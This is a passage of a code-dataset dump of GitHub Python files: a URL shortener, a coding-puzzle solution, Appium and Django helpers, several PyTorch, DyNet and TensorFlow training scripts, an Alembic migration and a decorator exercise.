1)) :\n rk = d[k+nIn-1] - d[k]\n if rk < r :\n r = rk\n i = k\n\n assert 0 <= i <= i+nIn-1 < len(d)\n \n return (d[i], d[i+nIn-1])\n\n\n###------------------------------------->>>> \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"LadnerLab/PepSIRF","sub_path":"extensions/signal2noise.py","file_name":"signal2noise.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"698302","text":"#open command prompt or you're version of it\n#install pyshorteners\n#type \"pip install pyshorteners\" then press enter\n# Go !\n\nimport pyshorteners\nurl = input (\"Enter URL you want to shorten:\")\nshortener = pyshorteners. Shortener()\nx = shortener.tinyurl.short(url)\nprint(x)\n","repo_name":"Aceboone011/Tiny-URL-code.-","sub_path":"TinyURL.py","file_name":"TinyURL.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71335749314","text":"import sys\nn = int(sys.stdin.readline())\nlst = []\n\ncnt = 1\ni = 1\n\nwhile cnt <= n:\n\n if '666' in str(i):\n lst.append(i)\n cnt += 1\n i += 1\n else:\n i += 1\n\nprint(lst[-1])\n","repo_name":"kokoko12334/TIL2","sub_path":"baekjoon/1436.py","file_name":"1436.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8899048893","text":"from appium import webdriver\nfrom pages.start_page import StartPage\nfrom pages.login_page import LoginPage\nfrom pages.side_menu import SideMenu\n\n\nclass Application:\n\n def __init__(self, capabilities, mode, executor):\n self.capabilities = capabilities\n\n appium_server_url = 'mode not specified'\n if mode == \"local\":\n appium_server_url = f'http://{executor}:4723'\n elif mode == \"grid\":\n appium_server_url = f'http://{executor}:4444/wd/hub'\n\n self.driver = webdriver.Remote(appium_server_url, self.capabilities)\n self.driver.implicitly_wait(20)\n self.start_page = StartPage(self.driver)\n self.login_page = LoginPage(self.driver)\n self.side_menu = SideMenu(self.driver)\n\n def destroy(self):\n if self.driver:\n self.driver.quit()\n","repo_name":"eezudin/mobile2","sub_path":"helpers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74148062914","text":"import argparse\nimport logging\nimport json\nimport random\nimport numpy as np\nimport dynet as dy\nfrom pathlib import Path\n\n# create logger\nlogger = logging.getLogger(\"mylog\")\nlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)\n\n\ndef loggerSeparator():\n logger.info(\"-----\")\n\n\nclass Embedding:\n def __init__(self, fileName):\n loggerSeparator()\n logger.info(\"Reading word vectors \" + fileName)\n self.words = self.readVectorsFromFile(fileName)\n logger.info(\"Creating UNK vector\")\n self.UNK = self.createUNKVector()\n\n self.knownCounter = 0\n self.unknownCounter = 0\n\n def embedWord(self, word):\n if word in self.words:\n self.knownCounter += 1\n return self.words[word]\n\n self.unknownCounter += 1\n return self.UNK\n\n def embedWords(self, words):\n return np.array(map(self.embedWord, words))\n\n def createUNKVector(self):\n vectors = []\n for i, w in enumerate(self.words):\n if i > 100:\n break\n vectors.append(self.words[w])\n\n return np.average(vectors, axis=0)\n\n def readVectorsFromFile(self, fileName):\n words = {}\n with open(fileName, \"r\") as lines:\n for line in lines:\n vector = line.split()\n word = vector.pop(0)\n words[word] = np.array(map(float, vector))\n return words\n\n\nLABELS = {\n u\"entailment\": 0,\n u\"contradiction\": 1,\n u\"neutral\": 2\n}\n\n\nclass SNLIData:\n def __init__(self, type, fileName, embedding):\n loggerSeparator()\n logger.info(\"Reading data \" + type + \" \" + fileName)\n\n self.data = []\n\n with open(fileName) as lines:\n for line in lines:\n datum = json.loads(line)\n gold = datum[\"gold_label\"]\n if gold != u\"-\":\n label = LABELS[gold]\n sentence1 = embedding.embedWords(datum[\"sentence1\"].lower().rstrip(\".\").split())\n sentence2 = embedding.embedWords(datum[\"sentence2\"].lower().rstrip(\".\").split())\n\n self.data.append((sentence1, sentence2, label))\n\n logger.info(type + \" size # sent \" + str(len(self.data)))\n logger.info(\"Known words \" + str(embedding.knownCounter) + \" / Unknown words \" + str(embedding.unknownCounter))\n\n\nclass Model:\n def __init__(self, embeddingSize, hiddenSize, labelsSize):\n self.model = dy.Model()\n self.trainer = dy.AdamTrainer(self.model)\n\n self.embeddingLinear = self.model.add_parameters((embeddingSize, hiddenSize))\n\n self.mlpF1 = self.model.add_parameters((hiddenSize, hiddenSize))\n self.mlpF2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.mlpG1 = self.model.add_parameters((2 * hiddenSize, hiddenSize))\n self.mlpG2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.mlpH1 = self.model.add_parameters((2 * hiddenSize, hiddenSize))\n self.mlpH2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.finaLinear = self.model.add_parameters((hiddenSize, labelsSize))\n\n def predict(self, data):\n return [self.forward(s1, s2) for (s1, s2, label) in data]\n\n def accuracy(self, data):\n good = total = 0.0\n predicted = self.predict(data)\n golds = [label for (s1, s2, label) in data]\n\n for pred, gold in zip(predicted, golds):\n total += 1\n if pred == gold:\n good += 1\n\n return good / total\n\n def forward(self, sent1, sent2, label=None):\n \"\"\"\n :param sent1: inputTensor\n :param sent2: inputTensor\n :param label: integer, range [0, 2]\n :return: loss\n \"\"\"\n # Fix embedding\n eL = dy.parameter(self.embeddingLinear)\n sent1 = dy.inputTensor(sent1) * eL\n sent2 = dy.inputTensor(sent2) * eL\n\n # F step\n Lf1 = dy.parameter(self.mlpF1)\n Fsent1 = dy.rectify(dy.dropout(sent1, 0.2) * Lf1)\n Fsent2 = dy.rectify(dy.dropout(sent2, 0.2) * Lf1)\n Lf2 = dy.parameter(self.mlpF2)\n Fsent1 = dy.rectify(dy.dropout(Fsent1, 0.2) * Lf2)\n Fsent2 = dy.rectify(dy.dropout(Fsent2, 0.2) * Lf2)\n\n # Attention scoring\n score1 = Fsent1 * dy.transpose(Fsent2)\n prob1 = dy.softmax(score1)\n\n score2 = dy.transpose(score1)\n prob2 = dy.softmax(score2)\n\n # Align pairs using attention\n sent1Pairs = dy.concatenate_cols([sent1, prob1 * sent2])\n sent2Pairs = dy.concatenate_cols([sent2, prob2 * sent1])\n\n # G step\n Lg1 = dy.parameter(self.mlpG1)\n Gsent1 = dy.rectify(dy.dropout(sent1Pairs, 0.2) * Lg1)\n Gsent2 = dy.rectify(dy.dropout(sent2Pairs, 0.2) * Lg1)\n Lg2 = dy.parameter(self.mlpG2)\n Gsent1 = dy.rectify(dy.dropout(Gsent1, 0.2) * Lg2)\n Gsent2 = dy.rectify(dy.dropout(Gsent2, 0.2) * Lg2)\n\n # Sum\n Ssent1 = dy.sum_dim(Gsent1, [0])\n Ssent2 = dy.sum_dim(Gsent2, [0])\n\n concat = dy.transpose(dy.concatenate([Ssent1, Ssent2]))\n\n # H step\n Lh1 = dy.parameter(self.mlpH1)\n Hsent = dy.rectify(dy.dropout(concat, 0.2) * Lh1)\n Lh2 = dy.parameter(self.mlpH2)\n Hsent = dy.rectify(dy.dropout(Hsent, 0.2) * Lh2)\n\n # Final layer\n finalLayer = dy.parameter(self.finaLinear)\n # final = dy.softmax(dy.transpose(Hsent * finalLayer))\n final = dy.transpose(Hsent * finalLayer)\n\n if label != None: # Label can be 0...\n return dy.pickneglogsoftmax(final, label)\n else:\n out = dy.softmax(final)\n chosen = np.argmax(out.npvalue())\n return chosen\n\n def save(self, modelFile):\n self.model.save(modelFile)\n\n def load(self, modelFile):\n self.model.populate(modelFile)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--train', help='training data file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_train.jsonl')\n\n parser.add_argument('--dev', help='development data file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_dev.jsonl')\n\n parser.add_argument('--test', help='test data file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_test.jsonl')\n\n parser.add_argument('--w2v', help='pretrained word vectors file (word tab vector)',\n type=str, default='deps.words')\n\n parser.add_argument('--embedding_size', help='word embedding size',\n type=int, default=300)\n\n parser.add_argument('--epochs', help='training epochs',\n type=int, default=25)\n\n parser.add_argument('--dev_interval', help='interval for development',\n type=int, default=1)\n\n parser.add_argument('--display_interval', help='interval of display by batches',\n type=int, default=5)\n\n parser.add_argument('--batch', help='size of batch',\n type=int, default=20000)\n\n parser.add_argument('--model', help='path of model file (not include the name suffix',\n type=str, default='model.save')\n\n parser.add_argument('--dynet-autobatch', help='dynet parameter',\n type=int, default=1)\n\n parser.add_argument('--dynet-mem', help='dynet parameter',\n type=int, default=8192)\n\n args = parser.parse_args()\n\n for arg in vars(args):\n logger.info(str(arg) + ' ' + str(getattr(args, arg)))\n\n embedding = Embedding(args.w2v)\n\n # load train/dev/test data\n trainData = SNLIData(\"train\", args.train, embedding)\n devData = SNLIData(\"dev\", args.dev, embedding)\n testData = SNLIData(\"test\", args.test, embedding)\n\n model = Model(args.embedding_size, 300, len(LABELS))\n\n modelFileCache = Path(args.model)\n if modelFileCache.is_file():\n model.load(args.model)\n\n losses = []\n\n # accuracy = model.accuracy(testData.data)\n # logger.info(\"Test Accuracy: \" + str(accuracy))\n\n # accuracy = model.accuracy(trainData.data[:10000])\n # logger.info(\"Train Accuracy: \" + str(accuracy))\n\n loss = tagged = 0\n for EPOCH in range(args.epochs):\n loggerSeparator()\n logger.info(\"Starting epoch \" + str(EPOCH))\n random.shuffle(trainData.data)\n\n errors = []\n dy.renew_cg()\n for i, (s1, s2, label) in enumerate(trainData.data, 1):\n if i % (args.batch * args.display_interval) == 0:\n avgLoss = loss / tagged\n losses.append(avgLoss)\n logger.info(str(EPOCH) + \"/\" + str(i) + \": \" + str(avgLoss))\n loss = tagged = 0\n\n accuracy = model.accuracy(devData.data)\n logger.info(\"Dev Accuracy: \" + str(accuracy))\n\n model.save(args.model)\n\n if i % args.batch == 0:\n errorsSum = dy.esum(errors)\n loss += errorsSum.value()\n tagged += args.batch\n\n errorsSum.backward()\n model.trainer.update()\n\n dy.renew_cg()\n errors = []\n\n errors.append(model.forward(s1, s2, label))\n","repo_name":"AmitMY/SNLI-decomposable-attention-dynet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72822319554","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom tempview.models import TempModel\n# Create your views here.\n\n\n# def index(request):\n# data = TempModel.objects.all()\n# context = {\n# 'data': data,\n# }\n# return render(request, 'tempview/index.html', context)\n\n\nclass TempView(TemplateView):\n template_name = 'tempview/index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n data = TempModel.objects.all()\n context['data'] = data\n return context\n\n\nclass TempDetailView(TemplateView):\n template_name = 'tempview/detail.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n id = kwargs['id']\n data = TempModel.objects.get(id=id)\n context['data'] = data\n return context\n","repo_name":"dev-SR/django","sub_path":"E_django_ClassViews/tempview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72237812353","text":"\"\"\"empty message\n\nRevision ID: 57f837f3f68a\nRevises: 6f064e32c53c\nCreate Date: 2023-04-27 11:39:46.959445\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '57f837f3f68a'\ndown_revision = '6f064e32c53c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('family',\n sa.Column('relationship_id', sa.Integer(), nullable=False),\n sa.Column('family_id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.Column('swimmer_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('relationship_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('family')\n # ### end Alembic commands ###\n","repo_name":"Cpierswim/SwimTeamManager","sub_path":"backend/migrations/versions/57f837f3f68a_.py","file_name":"57f837f3f68a_.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24511830352","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# PROGRAMMER: Kinan Turman\n# DATE CREATED: Feb. 23, 2019 \n# PURPOSE: A basic manager for saving and loading checkpoints. Used by train.py to save\n# a checkpoint and by predict.py to load a checkpoint/model to predict the classes for \n# a given image.\n\nimport torch\nimport build_model as bm\nimport torchvision\nfrom torchvision import datasets, models, utils\n\nimport os\n\ndef save_model(model, num_classes, class_to_idx_mapping, c_arch, hidden_units,\n learning_rate, dropout, path):\n\n \"\"\"\n This function saves the checkpoint\n\n Parameters:\n - model: the model we are saving (using state_dict())\n - num_classes: the output size\n - class_to_idx_mapping: the mapping of classes to indices which we get from the test set\n - c_arch: the choice of architecture\n - hidden_units: hidden units\n - learning_rate: the learning rate\n - dropout: the dropout\n - path: where we want to save the checkpoint\n\n Returns:\n - None\n \"\"\"\n\n model.class_to_idx = class_to_idx_mapping\n m_state_dict = model.state_dict()\n\n checkpoint = {'output_size': num_classes,\n 'dropout' : dropout,\n 'choice_model': c_arch,\n 'hidden_unit' : hidden_units,\n 'learning_rate': learning_rate,\n 'model_state_dict': m_state_dict,\n 'class_to_idx': model.class_to_idx}\n \n if path:\n # create the directory (first check that it does not exist):\n if not os.path.exists(path):\n os.mkdir(path)\n\n torch.save(checkpoint, path + '/' + 'checkpoint.pth')\n else:\n torch.save(checkpoint, 'checkpoint.pth')\n\n print('Model saved!')\n\ndef load_checkpoint(path):\n \"\"\"\n This loads a checkpoint\n\n Parameters:\n - path: path to the checkpoint (dir + filename)\n\n Returns:\n - None\n \"\"\"\n\n # load checkpoint\n checkpoint = torch.load(path)\n # load parameters\n num_classes = checkpoint['output_size']\n c_arch = checkpoint['choice_model']\n dropout = checkpoint['dropout']\n hidden_unit = checkpoint['hidden_unit']\n # load the model\n model = bm.initialize_model(c_arch, num_classes, hidden_unit, dropout)\n # load model state and class idx\n model.load_state_dict(checkpoint['model_state_dict'])\n model.class_to_idx = checkpoint['class_to_idx'] \n \n # print(\"Model Loaded: \", model)\n # print()\n #print(\"Class to idx: \", model.class_to_idx)\n\n return model","repo_name":"kinant/aipnd-project","sub_path":"checkpoint_manager.py","file_name":"checkpoint_manager.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32855405980","text":"import sys\nsys.path.append('..')\n\nimport argparse\nfrom configparser import ConfigParser\nimport ast\nimport os\nimport random\nfrom copy import deepcopy\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import Subset, DataLoader\nimport torchvision.transforms as T\n\nfrom datasets import MNIST, MNIST_M, SVHN, SynthDigits\nfrom models import SimpleCNN, MDANet, MODANet\nfrom routines import (fs_train_routine, fm_train_routine, dann_train_routine, mdan_train_routine, mdan_unif_train_routine,\n mdan_fm_train_routine, mdan_unif_fm_train_routine, moda_train_routine, moda_fm_train_routine)\nfrom utils import MSDA_Loader, Logger\nfrom augment import Flip\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Domain adaptation experiments with digits datasets.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-m', '--model', default='MODAFM', type=str, metavar='', help='model type (\\'FS\\' / \\'DANNS\\' / \\'DANNM\\' / \\'MDAN\\' / \\'MODA\\' / \\'FM\\' / \\'MODAFM\\'')\n parser.add_argument('-d', '--data_path', default='/ctm-hdd-pool01/DB/', type=str, metavar='', help='data directory path')\n parser.add_argument('-t', '--target', default='MNIST', type=str, metavar='', help='target domain (\\'MNIST\\' / \\'MNIST_M\\' / \\'SVHN\\' / \\'SynthDigits\\')')\n parser.add_argument('-o', '--output', default='msda.pth', type=str, metavar='', help='model file (output of train)')\n parser.add_argument('--icfg', default=None, type=str, metavar='', help='config file (overrides args)')\n parser.add_argument('--n_src_images', default=20000, type=int, metavar='', help='number of images from each source domain')\n parser.add_argument('--n_tgt_images', default=20000, type=int, metavar='', help='number of images from the target domain')\n parser.add_argument('--mu_d', type=float, default=1e-2, help=\"hyperparameter of the coefficient for the domain discriminator loss\")\n parser.add_argument('--mu_s', type=float, default=0.2, help=\"hyperparameter of the non-sparsity regularization\")\n parser.add_argument('--mu_c', type=float, default=1e-1, help=\"hyperparameter of the FixMatch loss\")\n parser.add_argument('--n_rand_aug', type=int, default=2, help=\"N parameter of RandAugment\")\n parser.add_argument('--m_min_rand_aug', type=int, default=3, help=\"minimum M parameter of RandAugment\")\n parser.add_argument('--m_max_rand_aug', type=int, default=10, help=\"maximum M parameter of RandAugment\")\n parser.add_argument('--weight_decay', default=0., type=float, metavar='', help='hyperparameter of weight decay regularization')\n parser.add_argument('--lr', default=1e-1, type=float, metavar='', help='learning rate')\n parser.add_argument('--epochs', default=30, type=int, metavar='', help='number of training epochs')\n parser.add_argument('--batch_size', default=8, type=int, metavar='', help='batch size (per domain)')\n parser.add_argument('--checkpoint', default=0, type=int, metavar='', help='number of epochs between saving checkpoints (0 disables checkpoints)')\n parser.add_argument('--eval_target', default=False, type=int, metavar='', help='evaluate target during training')\n parser.add_argument('--use_cuda', default=True, type=int, metavar='', help='use CUDA capable GPU')\n parser.add_argument('--use_visdom', default=False, type=int, metavar='', help='use Visdom to visualize plots')\n parser.add_argument('--visdom_env', default='digits_train', type=str, metavar='', help='Visdom environment name')\n parser.add_argument('--visdom_port', default=8888, type=int, metavar='', help='Visdom port')\n parser.add_argument('--verbosity', default=2, type=int, metavar='', help='log verbosity level (0, 1, 2)')\n parser.add_argument('--seed', default=42, type=int, metavar='', help='random seed')\n args = vars(parser.parse_args())\n\n # override args with icfg (if provided)\n cfg = args.copy()\n if cfg['icfg'] is not None:\n cv_parser = ConfigParser()\n cv_parser.read(cfg['icfg'])\n cv_param_names = []\n for key, val in cv_parser.items('main'):\n cfg[key] = ast.literal_eval(val)\n cv_param_names.append(key)\n\n # dump cfg to a txt file for your records\n with open(cfg['output'] + '.txt', 'w') as f:\n f.write(str(cfg)+'\\n')\n\n # use a fixed random seed for reproducibility purposes\n if cfg['seed'] > 0:\n random.seed(cfg['seed'])\n np.random.seed(seed=cfg['seed'])\n torch.manual_seed(cfg['seed'])\n torch.cuda.manual_seed(cfg['seed'])\n\n device = 'cuda' if (cfg['use_cuda'] and torch.cuda.is_available()) else 'cpu'\n log = Logger(cfg['verbosity'])\n log.print('device:', device, level=0)\n\n if ('FS' in cfg['model']) or ('FM' in cfg['model']):\n # weak data augmentation (small rotation + small translation)\n data_aug = T.Compose([\n T.RandomAffine(5, translate=(0.125, 0.125)),\n T.ToTensor(),\n ])\n else:\n data_aug = T.ToTensor()\n\n # define all datasets\n datasets = {}\n datasets['MNIST'] = MNIST(train=True, path=os.path.join(cfg['data_path'], 'MNIST'), transform=data_aug)\n datasets['MNIST_M'] = MNIST_M(train=True, path=os.path.join(cfg['data_path'], 'MNIST_M'), transform=data_aug)\n datasets['SVHN'] = SVHN(train=True, path=os.path.join(cfg['data_path'], 'SVHN'), transform=data_aug)\n datasets['SynthDigits'] = SynthDigits(train=True, path=os.path.join(cfg['data_path'], 'SynthDigits'), transform=data_aug)\n if ('FS' in cfg['model']) or ('FM' in cfg['model']):\n test_set = deepcopy(datasets[cfg['target']])\n test_set.transform = T.ToTensor() # no data augmentation in test\n else:\n test_set = datasets[cfg['target']]\n\n # get a subset of cfg['n_images'] from each dataset\n # define public and private test sets: the private is not used at training time to learn invariant representations\n for ds_name in datasets:\n if ds_name == cfg['target']:\n indices = random.sample(range(len(datasets[ds_name])), cfg['n_tgt_images']+cfg['n_src_images'])\n test_pub_set = Subset(test_set, indices[0:cfg['n_tgt_images']])\n test_priv_set = Subset(test_set, indices[cfg['n_tgt_images']::])\n datasets[cfg['target']] = Subset(datasets[cfg['target']], indices[0:cfg['n_tgt_images']])\n else:\n indices = random.sample(range(len(datasets[ds_name])), cfg['n_src_images'])\n datasets[ds_name] = Subset(datasets[ds_name], indices[0:cfg['n_src_images']])\n\n # build the dataloader\n train_loader = MSDA_Loader(datasets, cfg['target'], batch_size=cfg['batch_size'], shuffle=True, device=device)\n test_pub_loader = DataLoader(test_pub_set, batch_size=4*cfg['batch_size'])\n test_priv_loader = DataLoader(test_priv_set, batch_size=4*cfg['batch_size'])\n valid_loaders = ({'target pub': test_pub_loader, 'target priv': test_priv_loader}\n if cfg['eval_target'] else None)\n log.print('target domain:', cfg['target'], '| source domains:', train_loader.sources, level=1)\n\n if cfg['model'] == 'FS':\n model = SimpleCNN().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n if valid_loaders is not None:\n del valid_loaders['target pub']\n fs_train_routine(model, optimizer, test_pub_loader, valid_loaders, cfg)\n elif cfg['model'] == 'FM':\n model = SimpleCNN().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n cfg['excl_transf'] = [Flip]\n fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'DANNS':\n for src in train_loader.sources:\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n dataset_ss = {src: datasets[src], cfg['target']: datasets[cfg['target']]}\n train_loader = MSDA_Loader(dataset_ss, cfg['target'], batch_size=cfg['batch_size'], shuffle=True, device=device)\n dann_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n torch.save(model.state_dict(), cfg['output']+'_'+src)\n elif cfg['model'] == 'DANNM':\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n dann_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MDAN':\n model = MDANet(len(train_loader.sources)).to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n mdan_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MDANU':\n model = MDANet(len(train_loader.sources)).to(device)\n model.grad_reverse = nn.ModuleList([nn.Identity() for _ in range(len(model.domain_class))]) # remove grad reverse\n task_optim = optim.Adadelta(list(model.feat_ext.parameters())+list(model.task_class.parameters()),\n lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n adv_optim = optim.Adadelta(model.domain_class.parameters(),\n lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n optimizers = (task_optim, adv_optim)\n mdan_unif_train_routine(model, optimizers, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MDANFM':\n model = MDANet(len(train_loader.sources)).to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n mdan_fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MDANUFM':\n model = MDANet(len(train_loader.sources)).to(device)\n task_optim = optim.Adadelta(list(model.feat_ext.parameters())+list(model.task_class.parameters()),\n lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n adv_optim = optim.Adadelta(model.domain_class.parameters(),\n lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n optimizers = (task_optim, adv_optim)\n cfg['excl_transf'] = [Flip]\n mdan_unif_fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MODA':\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n moda_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MODAFM':\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n cfg['excl_transf'] = [Flip]\n moda_fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n else:\n raise ValueError('Unknown model {}'.format(cfg['model']))\n\n if cfg['model'] != 'DANNS':\n torch.save(model.state_dict(), cfg['output'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"dpernes/modafm","sub_path":"digits/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"13839172026","text":"import sys\n\nMESSAGE_LIST = []\n\ndef authorise(function):\n \"\"\"\n You need a function here authorise which contains another function called wrapper.\n This function authenticates the token against CrocodileLikesStrawberries and if valid calls the function given as input,\n authorise then needs to return wrapper.\n \"\"\"\n # Take in as many arguments as needed\n def wrapper(*args, **kwargs):\n # If token is invalid\n if not authorised(args[0]):\n raise Exception('Invalid token')\n # Gets rid of the token from the arguments list to add them to the message_list\n return function(*args[1:])\n return wrapper\ndef authorised(auth_token1):\n return auth_token1 == 'CrocodileLikesStrawberries'\n\n\n@authorise\ndef get_messages():\n return MESSAGE_LIST\n\n@authorise\ndef add_messages(msg):\n global MESSAGE_LIST\n MESSAGE_LIST.append(msg)\n\nif __name__ == '__main__':\n auth_token = \"\"\n if len(sys.argv) == 2:\n auth_token = sys.argv[1]\n else:\n auth_token = \"\"\n #auth_token = 'CrocodileLikesStrawberries'\n add_messages(auth_token, \"Hello\")\n add_messages(auth_token, \"How\")\n add_messages(auth_token, \"Are\")\n add_messages(auth_token, \"You?\")\n print(get_messages(auth_token))\n","repo_name":"eleans412/COMP1531-21T1","sub_path":"labs/lab09/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"500078037","text":"import argparse\nfrom glob import glob\nfrom os.path import join\n\nimport numpy as np\nimport tqdm\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\ncolors = [\n [0, 0, 0],\n [70, 70, 70],\n [190, 153, 153],\n [72, 0, 90],\n [220, 20, 60],\n [153, 153, 153],\n [157, 234, 50],\n [128, 64, 128],\n [244, 35, 232],\n [107, 142, 35],\n [0, 0, 142],\n [102, 102, 156],\n [220, 220, 0],\n [250, 170, 30],\n [180, 165, 180],\n [111, 74, 0],\n [119, 11, 32],\n [0, 0, 230],\n [255, 0, 0],\n [152, 251, 152],\n [70, 130, 180],\n [230, 150, 140],\n [81, 0, 81],\n [0, 0, 0],\n [150, 100, 100],\n [45, 60, 150],\n [0, 0, 70]\n]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', type=str, default='../data/IDDA/', help='path of training data')\n\n args = parser.parse_args()\n\n files = glob(join(args.data, \"train_labels\", \"*.png\"))\n classes = 27+1\n shape = (1920, 1080)\n\n running_counts = np.zeros(classes, dtype=np.int32)\n for i, file in enumerate(tqdm.tqdm(files)):\n\n # Open the image\n label = np.array(Image.open(file))\n\n # Map each RGBA color to the first byte (represents the class)\n label_class = label[:, :, 0]\n\n # Count the occurrences of every class\n counts = np.bincount(label_class.flatten(), minlength=classes).astype(np.int32)\n running_counts += counts\n\n class_map = [11, 1, 4, 11, 5, 3, 6, 6, 7, 10, 2, 11, 8, 11, 11, 11, 0, 11, 11, 11, 9, 11, 11, 11, 1, 11, 11]\n classes = [\"unlabeled\", \"building\", \"fence\", \"other\", \"pedestrian\", \"pole\", \"roadline\", \"road\", \"sidewalk\", \"vegetation\", \"car\", \"wall\", \"tsign\", \"tlight\", \"guardrail\", \"dynamic\", \"bicycle\", \"motorcycle\", \"rider\", \"terrain\", \"sky\", \"railtrack\", \"ground\", \"statics\", \"bridge\", \"water\", \"truck\"] # used_classes = np.zeros(12)\n\n tot_pixels = len(files) * shape[0] * shape[1]\n running_counts[6] += running_counts[7]\n running_counts[7] = 0\n\n rel_freq = running_counts / tot_pixels\n alt_freq = 1 / (np.log(1.02 + (running_counts / tot_pixels)))\n\n for name, scaled, log_scaled in zip(classes, rel_freq, alt_freq):\n print(f\"name: {name}\\tscaled: {scaled:.5f}\\tlog-scaled: {log_scaled:.5f}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nico995/Self-Supervised-Adversarial-Domain-Adaptation-in-Sematic-Segmentation","sub_path":"tools/class_frequencies.py","file_name":"class_frequencies.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34289402061","text":"import tensorflow as tf\n\nn_steps = 28\nn_inputs = 28\nneurons = [100, 50, 20]\nn_outputs = 10\nn_layers = 3\n\nlearning_rate = 0.001\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.int32, [None])\n# lstm_cells = [tf.nn.rnn_cell.BasicLSTMCell(num_units=neurons[layer])\n# for layer in range(n_layers)]\n#lstm_cells = [tf.contrib.rnn.LSTMBlockCell(num_units=neurons[layer])\n# for layer in range(n_layers)]\nlstm_cells = [tf.contrib.cudnn_rnn.CudnnCompatibleLSTMCell(num_units=neurons[layer])\n for layer in range(n_layers)]\nmulti_cell = tf.nn.rnn_cell.MultiRNNCell(lstm_cells)\noutputs, states = 